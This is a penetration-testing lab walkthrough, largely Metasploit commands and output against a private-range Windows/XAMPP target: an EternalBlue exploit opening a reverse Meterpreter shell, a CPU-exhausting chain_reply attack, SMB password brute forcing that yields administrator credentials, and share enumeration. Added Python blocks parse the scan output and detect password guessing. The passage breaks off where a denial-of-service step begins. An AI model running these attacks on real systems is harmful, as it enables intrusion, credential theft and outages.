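Penetration Testing Example: XAMPP Target Machine Lab
Lab name: Penetration testing example, XAMPP target machine lab
Lab objective: Perform a penetration test against the XAMPP target machine
Lab environment: one Kali virtual machine (4G); one XAMPP target machine, IP: 192.168.22.128
Lab steps:
I. Scan the target machine: use Nessus
II. Start the Metasploit framework and scan
msf6 > db_nmap -A -T4 192.168.22.128 (scan with nmap)
(1) Perform the penetration test
Scan for SMB version information
msf6 > search smb_version (check whether there is an SMB version scanning module)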
Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version
msf6 > use auxiliary/scanner/smb/smb_version (select the module)
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.22.128 (set the IP address to scan)
rhosts => 192.168.22.128
msf6 auxiliary(scanner/smb/smb_version) > run (execute)
[*] 192.168.22.128:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:2w 3d 1h 19m 15s) (guid:{079eddaa-883e-448c-9c75-df3fb0d2aa5c}) (authentication domain:W2K8)
[+] 192.168.22.128:445 - Host is running Windows 2008 R2 Datacenter SP1 (build:7601) (name:W2K8) (workgroup:WORKGROUP)
[*] 192.168.22.128: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
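The scanner output above already names the hardening gaps a defender would act on (SMBv1 offered, signing optional, an out-of-support OS). The following is an added example, not part of the original write-up: it parses the two scanner lines into fields and lists those gaps. The function names and the wording of the findings are assumptions made for this illustration.

```python
import re

# Constructed input: the two smb_version result lines shown above.
SCAN_LINES = [
    "[*] 192.168.22.128:445 - SMB Detected (versions:1, 2) "
    "(preferred dialect:SMB 2.1) (signatures:optional) (uptime:2w 3d 1h 19m 15s) "
    "(guid:{079eddaa-883e-448c-9c75-df3fb0d2aa5c}) (authentication domain:W2K8)",
    "[+] 192.168.22.128:445 - Host is running Windows 2008 R2 Datacenter SP1 "
    "(build:7601) (name:W2K8) (workgroup:WORKGROUP)",
]

# "(key:value)" groups; the key ends at the first colon.
FIELD_RE = re.compile(r"\(([^():]+):([^()]*)\)")
# Status marker, then "ip:port - "; "[]" is accepted because copied logs
# often lose the asterisk of "[*]".
HOST_RE = re.compile(r"^\[[*+\-]?\]\s+(\d+\.\d+\.\d+\.\d+):(\d+)\s+-\s+")
OS_RE = re.compile(r"Host is running (.+?) \(")


def parse_scan(lines):
    """Return {ip: {field: value}} merged from all result lines of a host."""
    hosts = {}
    for line in lines:
        match = HOST_RE.match(line)
        if not match:
            continue  # summary lines such as "Scanned 1 of 1 hosts"
        fields = hosts.setdefault(match.group(1), {})
        for key, value in FIELD_RE.findall(line):
            fields[key.strip()] = value.strip()
        os_match = OS_RE.search(line)
        if os_match:
            fields["os"] = os_match.group(1)
    return hosts


def hardening_findings(fields):
    """Translate parsed fields into defensive actions (wording is illustrative)."""
    findings = []
    versions = {v.strip() for v in fields.get("versions", "").split(",")}
    if "1" in versions:
        findings.append("SMBv1 is offered: disable the SMB1 protocol on the server")
    if fields.get("signatures") == "optional":
        findings.append("SMB signing is optional: require signing to resist relay")
    if "2008" in fields.get("os", ""):
        # Windows Server 2008 / 2008 R2 no longer receive regular security updates.
        findings.append("OS is past vendor support: verify patch level, plan migration")
    return findings


if __name__ == "__main__":
    for ip, fields in parse_scan(SCAN_LINES).items():
        print(ip, fields.get("os"), "build", fields.get("build"))
        for finding in hardening_findings(fields):
            print("  -", finding)
```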
(2) First look for the first exposed weakness
msf6 auxiliary(scanner/smb/smb_version) > search smb description:2 (look for matching modules)
Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/admin/mssql/mssql_ntlm_stealer normal No Microsoft SQL Server NTLM Stealer
1 auxiliary/docx/word_unc_injector normal No Microsoft Word UNC Path Injector
2 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
3 auxiliary/dos/windows/smb/ms05_047_pnp normal No Microsoft Plug and Play Service Registry Overflow
4 auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh normal No Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
5 auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff normal No Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
6 auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop normal No Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop
7 auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow normal No Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
8 auxiliary/dos/windows/smb/ms11_019_electbowser normal No Microsoft Windows Browser Pool DoS
9 auxiliary/fuzzers/smb/smb2_negotiate_corrupt normal No SMB Negotiate SMB2 Dialect Corruption
10 auxiliary/gather/konica_minolta_pwd_extract normal No Konica Minolta Password Extractor
11 auxiliary/scanner/http/citrix_dir_traversal 2019-12-17 normal No Citrix ADC (NetScaler) Directory Traversal Scanner
12 auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir normal No SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing
13 auxiliary/scanner/smb/smb_enum_gpp normal No SMB Group Policy Preference Saved Passwords Enumeration
14 auxiliary/server/capture/smb normal No Authentication Capture: SMB
15 auxiliary/server/teamviewer_uri_smb_redirect normal No TeamViewer Unquoted URI Handler SMB Redirect
16 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
17 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
18 exploit/multi/ids/snort_dce_rpc 2007-02-19 good No Snort 2 DCE/RPC Preprocessor Buffer Overflow
19 exploit/windows/browser/java_ws_double_quote 2012-10-16 excellent No Sun Java Web Start Double Quote Injection
20 exploit/windows/fileformat/ms13_071_theme 2013-09-10 excellent No MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution
21 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
22 exploit/windows/fileformat/ursoft_w32dasm 2005-01-24 good No URSoft W32Dasm Disassembler Function Buffer Overflow
23 exploit/windows/fileformat/vlc_smb_uri 2009-06-24 great No VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
24 exploit/windows/misc/hp_dataprotector_cmd_exec 2014-11-02 excellent Yes HP Data Protector 8.10 Remote Command Execution
25 exploit/windows/misc/hp_dataprotector_install_service 2011-11-02 excellent Yes HP Data Protector 6.10/6.11/6.20 Install Service
26 exploit/windows/smb/ms03_049_netapi 2003-11-11 good No MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
27 exploit/windows/smb/ms04_007_killbill 2004-02-10 low No MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow
28 exploit/windows/smb/ms04_031_netdde 2004-10-12 good No MS04-031 Microsoft NetDDE Service Overflow
29 exploit/windows/smb/ms05_039_pnp 2005-08-09 good Yes MS05-039 Microsoft Plug and Play Service Overflow
30 exploit/windows/smb/ms06_025_rasmans_reg 2006-06-13 good No MS06-025 Microsoft RRAS Service RASMAN Registry Overflow
31 exploit/windows/smb/ms06_025_rras 2006-06-13 average No MS06-025 Microsoft RRAS Service Overflow
32 exploit/windows/smb/ms06_040_netapi 2006-08-08 good No MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
33 exploit/windows/smb/ms06_066_nwapi 2006-11-14 good No MS06-066 Microsoft Services nwapi32.dll Module Exploit
34 exploit/windows/smb/ms06_066_nwwks 2006-11-14 good No MS06-066 Microsoft Services nwwks.dll Module Exploit
35 exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual No MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
36 exploit/windows/smb/ms07_029_msdns_zonename 2007-04-12 manual No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
37 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
38 exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
39 exploit/windows/smb/ms10_061_spoolss 2010-09-14 excellent No MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability
40 exploit/windows/smb/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution
41 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
42 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
43 exploit/windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution
44 payload/windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
45 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
46 post/windows/gather/credentials/gpp normal No Windows Gather Group Policy Preference Saved Passwords
47 post/windows/gather/word_unc_injector normal No Windows Gather Microsoft Office Word UNC Path Injector
Interact with a module by name or index. For example info 47, use 47 or use post/windows/gather/word_unc_injector
1. Use a memory corruption attack
msf6 > use exploit windows/misc/hp_dataprotector_install_service (enter this module first)
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
Matching Modules
Name Disclosure Date Rank Check Description
0 exploit/windows/misc/hp_dataprotector_install_service 2011-11-02 excellent Yes HP Data Protector 6.10/6.11/6.20 Install Service
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/misc/hp_dataprotector_install_service
[*] Using exploit/windows/misc/hp_dataprotector_install_service
msf6 exploit(windows/misc/hp_dataprotector_install_service) > use exploit/linux/samba/chain_reply (select the module)
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/samba/chain_reply) > set rhosts 192.168.22.128 (set the target IP address)
rhosts => 192.168.22.128
msf6 exploit(linux/samba/chain_reply) > run (execute)
[*] Started reverse TCP handler on 192.168.22.100:4444
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
[*] 192.168.22.128:139 - Trying return address 0x081ed5f2…
[-] 192.168.22.128:139 - The connection timed out (192.168.22.128:139).
Check the target machine's Task Manager to view resource usage
CPU usage is very high and the machine lags badly; pressing Ctrl+C in Kali to stop the attack returns it to normal. The attack succeeded.
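2. Use the EternalBlue vulnerability
msf6 exploit(windows/misc/hp_dataprotector_install_service) > search Windows 2008 R2 (search based on the patches that are not installed; condition 2: the information returned by the earlier SMB scan)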
Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh normal No Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
1 auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop normal No Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop
2 auxiliary/scanner/dcerpc/windows_deployment_services normal No Microsoft Windows Deployment Services Unattend Retrieval
3 auxiliary/scanner/smb/smb_enum_gpp normal No SMB Group Policy Preference Saved Passwords Enumeration
4 exploit/multi/http/cisco_dcnm_upload 2013-09-18 excellent Yes Cisco Prime Data Center Network Manager Arbitrary File Upload
5 exploit/multi/http/rocket_servergraph_file_requestor_rce 2013-10-30 great Yes Rocket Servergraph Admin Center fileRequestor Remote Code Execution
6 exploit/multi/misc/hp_data_protector_exec_integutil 2014-10-02 great Yes HP Data Protector EXEC_INTEGUTIL Remote Code Execution
7 exploit/windows/emc/alphastor_device_manager_exec 2013-01-18 excellent Yes EMC AlphaStor Device Manager Opcode 0x75 Command Injection
8 exploit/windows/http/ektron_xslt_exec_ws 2015-02-05 excellent Yes Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution
9 exploit/windows/http/oracle_endeca_exec 2013-07-16 excellent Yes Oracle Endeca Server Remote Command Execution
10 exploit/windows/http/sap_configservlet_exec_noauth 2012-11-01 great Yes SAP ConfigServlet Remote Code Execution
11 exploit/windows/local/cve_2018_8453_win32k_priv_esc 2018-10-09 manual No Windows NtUserSetWindowFNID Win32k User Callback
12 exploit/windows/local/ms13_005_hwnd_broadcast 2012-11-27 excellent No MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
13 exploit/windows/local/ms14_058_track_popup_menu 2014-10-14 normal Yes Windows TrackPopupMenu Win32k NULL Pointer Dereference
14 exploit/windows/local/ms15_051_client_copy_image 2015-05-12 normal Yes Windows ClientCopyImage Win32k Exploit
15 exploit/windows/local/ms18_8120_win32k_privesc 2018-05-09 good No Windows SetImeInfoEx Win32k NULL Pointer Dereference
16 exploit/windows/misc/hp_dataprotector_encrypted_comms 2016-04-18 normal Yes HP Data Protector Encrypted Communication Remote Command Execution
17 exploit/windows/misc/hp_dataprotector_exec_bar 2014-01-02 excellent Yes HP Data Protector Backup Client Service Remote Code Execution
18 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
19 exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
20 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
21 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
22 post/windows/gather/credentials/gpp normal No Windows Gather Group Policy Preference Saved Passwords
23 post/windows/gather/credentials/windows_autologin normal No Windows Gather AutoLogin User Credential Extractor
Interact with a module by name or index. For example info 23, use 23 or use post/windows/gather/credentials/windows_autologin
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit windows/smb/ms17_010_eternalblue (enter this module first)
Matching Modules
Name Disclosure Date Rank Check Description
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/smb/ms17_010_eternalblue_win8
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue (select the EternalBlue module)
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.22.128 (set the target IP address)
rhosts => 192.168.22.128
msf6 exploit(windows/smb/ms17_010_eternalblue) > run (execute)
[*] Started reverse TCP handler on 192.168.22.100:4444
[*] 192.168.22.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.22.128:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.22.128:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.22.128:445 - Connecting to target for exploitation.
[+] 192.168.22.128:445 - Connection established for exploitation.
[+] 192.168.22.128:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.22.128:445 - CORE raw buffer dump (53 bytes)
[*] 192.168.22.128:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.22.128:445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65 008 R2 Datacente
[*] 192.168.22.128:445 - 0x00000020 72 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 r 7601 Service P
[*] 192.168.22.128:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 192.168.22.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.22.128:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.22.128:445 - Sending all but last fragment of exploit packet
[*] 192.168.22.128:445 - Starting non-paged pool grooming
[+] 192.168.22.128:445 - Sending SMBv2 buffers
[+] 192.168.22.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.22.128:445 - Sending final SMBv2 buffers.
[*] 192.168.22.128:445 - Sending last fragment of exploit packet!
[*] 192.168.22.128:445 - Receiving response from exploit packet
[+] 192.168.22.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.22.128:445 - Sending egg to corrupted connection.
[*] 192.168.22.128:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.22.128
[*] Meterpreter session 1 opened (192.168.22.100:4444 -> 192.168.22.128:51346) at 2021-02-07 00:06:13 +0800
[+] 192.168.22.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.22.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.22.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Verification
meterpreter > pwd
C:\Windows\system32
meterpreter > cd D:
meterpreter > pwd
D:
meterpreter >
3. SMB user login enumeration
Copy the attack package to the virtual machine and add the XAMPP root password
msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/smb/smb_login (select the module)
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.22.128 (set the target IP address)
rhosts => 192.168.22.128
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /root/wen.txt (specify the dictionary file)
pass_file => /root/wen.txt
msf6 auxiliary(scanner/smb/smb_login) > set smbuser administrator (set the user name)
smbuser => administrator
msf6 auxiliary(scanner/smb/smb_login) > run (execute; the user's password is obtained)
[*] 192.168.22.128:445 - 192.168.22.128:445 - Starting SMB login bruteforce
[-] 192.168.22.128:445 - 192.168.22.128:445 - Failed: '.\administrator:root',
[-] 192.168.22.128:445 - 192.168.22.128:445 - Failed: '.\administrator:admin',
[-] 192.168.22.128:445 - 192.168.22.128:445 - Failed: '.\administrator:test',
[-] 192.168.22.128:445 - 192.168.22.128:445 - Failed: '.\administrator:system',
[-] 192.168.22.128:445 - 192.168.22.128:445 - Failed: '.\administrator:guest',
[+] 192.168.22.128:445 - 192.168.22.128:445 - Success: '.\administrator:p@9865321' Administrator
[*] 192.168.22.128:445 - 192.168.22.128:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
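On the target, a run like the one above leaves a burst of failed network logons for one account from one source, followed by a success. The following is an added example, not part of the original write-up, of detection logic for that pattern. It assumes Windows Security events already reduced to (time, event ID, logon type, account, source IP) tuples, where 4625 is a failed logon, 4624 a successful one, and logon type 3 a network logon; the sample events, threshold and window are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events (timestamps are illustrative).
EVENTS = [
    # Five failures and then a success for administrator from the Kali host.
    *[(f"2021-02-07T00:20:0{s}", 4625, 3, "administrator", "192.168.22.100")
      for s in range(1, 6)],
    ("2021-02-07T00:20:06", 4624, 3, "administrator", "192.168.22.100"),
    # One mistyped password, then success: normal user behaviour.
    ("2021-02-07T00:30:00", 4625, 3, "backup", "192.168.22.50"),
    ("2021-02-07T00:30:10", 4624, 3, "backup", "192.168.22.50"),
    # Five failures spread over 40 minutes: outside the window, no alert.
    *[(f"2021-02-07T01:{m:02d}:00", 4625, 3, "administrator", "192.168.22.60")
      for m in range(0, 50, 10)],
    ("2021-02-07T01:41:00", 4624, 3, "administrator", "192.168.22.60"),
    # Console logon (type 2) is out of scope for an SMB detection.
    ("2021-02-07T02:00:00", 4624, 2, "administrator", "127.0.0.1"),
]


def detect_guess_then_success(events, threshold=5, window=timedelta(minutes=5)):
    """Alert when >= threshold failed network logons for one account from one
    source inside `window` are followed by a successful logon from that source."""
    recent = defaultdict(deque)  # (account, source) -> failure timestamps
    alerts = []
    for ts_text, event_id, logon_type, account, source in sorted(events):
        if logon_type != 3:
            continue
        ts = datetime.fromisoformat(ts_text)
        fails = recent[(account.lower(), source)]
        # Drop failures that have aged out of the sliding window.
        while fails and ts - fails[0] > window:
            fails.popleft()
        if event_id == 4625:
            fails.append(ts)
        elif event_id == 4624 and len(fails) >= threshold:
            alerts.append({
                "account": account.lower(),
                "source": source,
                "failures": len(fails),
                "success_at": ts_text,
            })
            fails.clear()  # one alert per burst
    return alerts


if __name__ == "__main__":
    for alert in detect_guess_then_success(EVENTS):
        print("password guessing followed by success:", alert)
```

An alert of this kind means the credential must be treated as compromised and reset; an account lockout policy keeps such a dictionary run from reaching the correct password.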
4. SMB enumeration of which users exist
msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/smb/smb_enumshares (select the module)
msf6 auxiliary(scanner/smb/smb_enumshares) > set rhosts 192.168.22.128 (set the target IP address)
rhosts => 192.168.22.128
msf6 auxiliary(scanner/smb/smb_enumshares) > set smbuser administrator (set the user name)
smbuser => administrator
msf6 auxiliary(scanner/smb/smb_enumshares) > set smbpass p@9865321 (set the password obtained earlier)
smbpass => p@9865321
msf6 auxiliary(scanner/smb/smb_enumshares) > set showfiles true (set the option)
showfiles => true
msf6 auxiliary(scanner/smb/smb_enumshares) > set spidershares true (set the option)
spidershares => true
msf6 auxiliary(scanner/smb/smb_enumshares) > run (execute)
5. SMB enumeration of which users exist
msf6 auxiliary(scanner/smb/smb_enumshares) > use auxiliary/scanner/smb/smb_enumshares (select the module)
msf6 auxiliary(scanner/smb/smb_enumshares) > set rhosts 192.168.22.128 (set the target IP address)
rhosts => 192.168.22.128
msf6 auxiliary(scanner/smb/smb_enumshares) > set smbuser administrator (set the user name)
smbuser => administrator
msf6 auxiliary(scanner/smb/smb_enumshares) > set smbpass p@9865321 (set the password obtained earlier)
smbpass => p@9865321
msf6 auxiliary(scanner/smb/smb_enumshares) > run (execute)
6. HTTP scan: check the robots.txt file
msf6 auxiliary(scanner/smb/smb_enumshares) > use auxiliary scanner/http/cert (select the module)
Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/scanner/http/cert normal No HTTP SSL Certificate Checker
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/cert
[*] Using auxiliary/scanner/http/cert
msf6 auxiliary(scanner/http/cert) > use auxiliary/scanner/http/robots_txt (select the module)
msf6 auxiliary(scanner/http/robots_txt) > set rhosts 192.168.22.128 (set the target IP address)
rhosts => 192.168.22.128
msf6 auxiliary(scanner/http/robots_txt) > set rport 84 (set the target port number)
rport => 84
msf6 auxiliary(scanner/http/robots_txt) > run (execute)
[-] [192.168.22.128] /robots.txt - No response
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
7. Use hping3 to cause a denial-of-service attack
──(root